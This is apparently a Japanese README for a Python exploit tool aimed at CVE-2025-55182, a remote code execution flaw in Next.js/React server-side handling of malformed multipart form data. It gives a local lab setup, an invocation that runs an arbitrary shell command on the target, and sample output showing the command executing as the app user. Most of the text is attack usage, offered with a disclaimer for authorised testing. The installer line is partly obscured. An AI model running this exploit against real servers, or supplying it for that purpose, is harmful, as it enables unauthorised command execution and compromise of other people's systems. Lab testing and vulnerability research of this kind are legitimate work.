
Next.js/ReactのサーバーサイドJavaScriptインジェクションにより、不正なマルチパートフォームデータを介してリモートコード実行を可能にするCVE-2025-55182のPythonエクスプロイトです。許可されたテスト用のラボセットアップを含みます。
Python 3 スクリプト。CVE-2025-55182 を実証するために使用できます。Next.js/React アプリケーションのサーバーサイド JavaScript インジェクション脆弱性を悪用し、不正なマルチパートフォームデータを介した リモートコード実行 を可能にします。
⚠️ 教育および許可されたテスト目的のみに使用してください。
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u ターゲットのドメインまたはIP(プロトコル付き) - http://localhost:3000 -c サーバー上で実行するコマンド - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)